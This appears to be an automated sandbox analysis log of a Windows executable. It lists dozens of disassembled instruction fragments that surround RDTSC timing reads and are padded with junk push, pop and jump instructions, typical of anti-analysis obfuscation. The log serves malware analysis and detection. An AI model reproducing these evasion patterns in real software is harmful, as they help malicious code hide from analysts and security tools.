Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0DB4 second address: 71C0DD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, edx 0x00000011 mov ax, bx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0DD5 second address: 71C0E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movzx esi, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FCBA141C932h 0x00000013 add ax, B0E8h 0x00000018 jmp 00007FCBA141C92Bh 0x0000001d popfd 0x0000001e mov ah, 20h 0x00000020 popad 0x00000021 mov dword ptr [esp], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FCBA141C92Eh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0E7B second address: 71C0E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0E81 second address: 71C0E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0F92 second address: 71C1061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FCBA141FCB4h 0x00000009 jmp 00007FCBA141FCB2h 0x0000000e pop ecx 0x0000000f popad 0x00000010 jne 00007FCC111FE3C4h 0x00000016 jmp 00007FCBA141FCB1h 0x0000001b mov edx, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f push ecx 0x00000020 mov si, bx 0x00000023 pop edx 0x00000024 pushfd 0x00000025 jmp 00007FCBA141FCB4h 0x0000002a and ax, 4228h 0x0000002f jmp 00007FCBA141FCABh 0x00000034 popfd 0x00000035 popad 0x00000036 mov eax, dword ptr [esi] 0x00000038 pushad 0x00000039 mov dl, ch 0x0000003b pushfd 0x0000003c jmp 00007FCBA141FCB1h 0x00000041 adc esi, 2E163246h 0x00000047 jmp 00007FCBA141FCB1h 0x0000004c popfd 0x0000004d popad 0x0000004e mov dword ptr [edx], eax 0x00000050 jmp 00007FCBA141FCAEh 0x00000055 mov eax, dword ptr [esi+04h] 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FCBA141FCB7h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1061 second address: 71C109B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c jmp 00007FCBA141C92Eh 0x00000011 mov eax, dword ptr [esi+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bl, C7h 0x00000019 movzx ecx, di 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C109B second address: 71C10A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C10A1 second address: 71C10A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C10A5 second address: 71C1106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+08h], eax 0x0000000b jmp 00007FCBA141FCB6h 0x00000010 mov eax, dword ptr [esi+0Ch] 0x00000013 jmp 00007FCBA141FCB0h 0x00000018 mov dword ptr [edx+0Ch], eax 0x0000001b pushad 0x0000001c mov edx, ecx 0x0000001e pushfd 0x0000001f jmp 00007FCBA141FCAAh 0x00000024 or eax, 564E1398h 0x0000002a jmp 00007FCBA141FCABh 0x0000002f popfd 0x00000030 popad 0x00000031 mov eax, dword ptr [esi+10h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1106 second address: 71C1121 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1121 second address: 71C116A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FCBA141FCAFh 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [edx+10h], eax 0x00000011 jmp 00007FCBA141FCB5h 0x00000016 mov eax, dword ptr [esi+14h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pop ecx 0x0000001d pop edx 0x0000001e mov al, C1h 0x00000020 popad 0x00000021 mov dword ptr [edx+14h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ax, CAEFh 0x0000002b mov bx, cx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C116A second address: 71C1170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1170 second address: 71C1174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1174 second address: 71C11A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e mov eax, edx 0x00000010 popad 0x00000011 mov dword ptr [edx+18h], eax 0x00000014 jmp 00007FCBA141C933h 0x00000019 mov eax, dword ptr [esi+1Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ecx, edx 0x00000021 mov esi, edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C11A6 second address: 71C1243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA141FCB6h 0x00000009 sub eax, 7FA361D8h 0x0000000f jmp 00007FCBA141FCABh 0x00000014 popfd 0x00000015 mov ecx, 48A1008Fh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [edx+1Ch], eax 0x00000020 jmp 00007FCBA141FCB2h 0x00000025 mov eax, dword ptr [esi+20h] 0x00000028 pushad 0x00000029 pushad 0x0000002a mov eax, 4FE2E813h 0x0000002f mov cx, F26Fh 0x00000033 popad 0x00000034 call 00007FCBA141FCB4h 0x00000039 jmp 00007FCBA141FCB2h 0x0000003e pop ecx 0x0000003f popad 0x00000040 mov dword ptr [edx+20h], eax 0x00000043 jmp 00007FCBA141FCB1h 0x00000048 mov eax, dword ptr [esi+24h] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1243 second address: 71C1247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1247 second address: 71C124D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C124D second address: 71C12C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA141C930h 0x00000009 sbb al, 00000058h 0x0000000c jmp 00007FCBA141C92Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FCBA141C938h 0x00000018 sbb ah, FFFFFFB8h 0x0000001b jmp 00007FCBA141C92Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [edx+24h], eax 0x00000027 jmp 00007FCBA141C936h 0x0000002c mov eax, dword ptr [esi+28h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FCBA141C92Ah 0x00000038 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C12C5 second address: 71C12D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C12D4 second address: 71C1349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b jmp 00007FCBA141C92Dh 0x00000010 mov ecx, dword ptr [esi+2Ch] 0x00000013 pushad 0x00000014 mov ebx, eax 0x00000016 mov ax, 809Fh 0x0000001a popad 0x0000001b mov dword ptr [edx+2Ch], ecx 0x0000001e pushad 0x0000001f call 00007FCBA141C930h 0x00000024 pushad 0x00000025 popad 0x00000026 pop esi 0x00000027 pushfd 0x00000028 jmp 00007FCBA141C931h 0x0000002d sub ah, 00000076h 0x00000030 jmp 00007FCBA141C931h 0x00000035 popfd 0x00000036 popad 0x00000037 mov ax, word ptr [esi+30h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FCBA141C92Dh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1349 second address: 71C1399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, dx 0x00000013 pushfd 0x00000014 jmp 00007FCBA141FCAFh 0x00000019 adc esi, 4428070Eh 0x0000001f jmp 00007FCBA141FCB9h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1399 second address: 71C13B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 2E93A822h 0x00000008 mov ax, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ax, word ptr [esi+32h] 0x00000012 pushad 0x00000013 mov di, 5346h 0x00000017 push eax 0x00000018 push edx 0x00000019 mov di, E5A0h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C13B6 second address: 71C13C8 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov word ptr [edx+32h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C13C8 second address: 71C13CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C13CE second address: 71C1441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 pushfd 0x00000006 jmp 00007FCBA141FCAEh 0x0000000b adc cx, 0318h 0x00000010 jmp 00007FCBA141FCABh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [esi+34h] 0x0000001c jmp 00007FCBA141FCB6h 0x00000021 mov dword ptr [edx+34h], eax 0x00000024 jmp 00007FCBA141FCB0h 0x00000029 test ecx, 00000700h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FCBA141FCB7h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1441 second address: 71C1464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA141C92Fh 0x00000008 mov ebx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007FCC111FABE5h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1464 second address: 71C1468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C1468 second address: 71C147F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C933h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0836 second address: 71B083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B083A second address: 71B0840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0840 second address: 71B0846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0846 second address: 71B084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B084A second address: 71B0894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FCBA141FCB5h 0x00000011 pop eax 0x00000012 pushfd 0x00000013 jmp 00007FCBA141FCB1h 0x00000018 adc cl, FFFFFFC6h 0x0000001b jmp 00007FCBA141FCB1h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7150073 second address: 7150083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141C92Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7150655 second address: 7150659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7150659 second address: 715065D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 715065D second address: 7150663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7150A07 second address: 7150A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7150A22 second address: 7150A78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FCBA141FCB3h 0x00000014 sbb cl, 0000000Eh 0x00000017 jmp 00007FCBA141FCB9h 0x0000001c popfd 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7150A78 second address: 7150A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141C92Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801A1 second address: 71801B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141FCB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801B9 second address: 71801EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dl, cl 0x0000000f mov dh, 29h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FCBA141C935h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801EB second address: 71801EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801EF second address: 71801F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801F5 second address: 71801FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801FB second address: 71801FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71801FF second address: 7180264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FCBA141FCB7h 0x00000012 and cl, FFFFFF9Eh 0x00000015 jmp 00007FCBA141FCB9h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FCBA141FCB0h 0x00000021 or esi, 1EDDEB98h 0x00000027 jmp 00007FCBA141FCABh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7180264 second address: 718029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCBA141C938h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 718029F second address: 71802AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71802AE second address: 718031B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 464F7B7Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF0h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FCBA141C92Ah 0x00000015 add cl, FFFFFFB8h 0x00000018 jmp 00007FCBA141C92Bh 0x0000001d popfd 0x0000001e mov ecx, 79B382EFh 0x00000023 popad 0x00000024 sub esp, 44h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FCBA141C937h 0x00000030 add al, 0000002Eh 0x00000033 jmp 00007FCBA141C939h 0x00000038 popfd 0x00000039 push esi 0x0000003a pop edi 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 718031B second address: 71803DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA141FCB3h 0x00000008 mov esi, 380F299Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov di, ax 0x00000015 mov di, cx 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FCBA141FCB9h 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FCBA141FCACh 0x00000027 sbb cl, 00000068h 0x0000002a jmp 00007FCBA141FCABh 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007FCBA141FCB8h 0x00000036 xor cx, BDC8h 0x0000003b jmp 00007FCBA141FCABh 0x00000040 popfd 0x00000041 popad 0x00000042 xchg eax, esi 0x00000043 jmp 00007FCBA141FCB6h 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushfd 0x0000004d jmp 00007FCBA141FCAAh 0x00000052 adc si, 8358h 0x00000057 jmp 00007FCBA141FCABh 0x0000005c popfd 0x0000005d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71803DC second address: 7180413 instructions: 0x00000000 rdtsc 0x00000002 call 00007FCBA141C938h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c jmp 00007FCBA141C931h 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7180413 second address: 7180417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 7180417 second address: 718041D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 718041D second address: 7180423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 718055D second address: 71805D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b jmp 00007FCBA141C936h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FCBA141C92Dh 0x0000001a add ax, 4766h 0x0000001f jmp 00007FCBA141C931h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007FCBA141C930h 0x0000002b and esi, 22396F08h 0x00000031 jmp 00007FCBA141C92Bh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71805D1 second address: 71805D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71805D7 second address: 71805DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B08C0 second address: 71B08D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141FCACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B08D0 second address: 71B0921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a movzx ecx, bx 0x0000000d mov edi, 686A926Ah 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007FCBA141C931h 0x0000001b mov ebp, esp 0x0000001d jmp 00007FCBA141C92Eh 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FCBA141C937h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0921 second address: 71B0939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141FCB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71B0939 second address: 71B093D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0908 second address: 71A090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A090C second address: 71A0912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0912 second address: 71A0918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0918 second address: 71A091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A091C second address: 71A0920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0920 second address: 71A0931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0931 second address: 71A095E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCBA141FCAEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A095E second address: 71A0964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71A0964 second address: 71A0968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
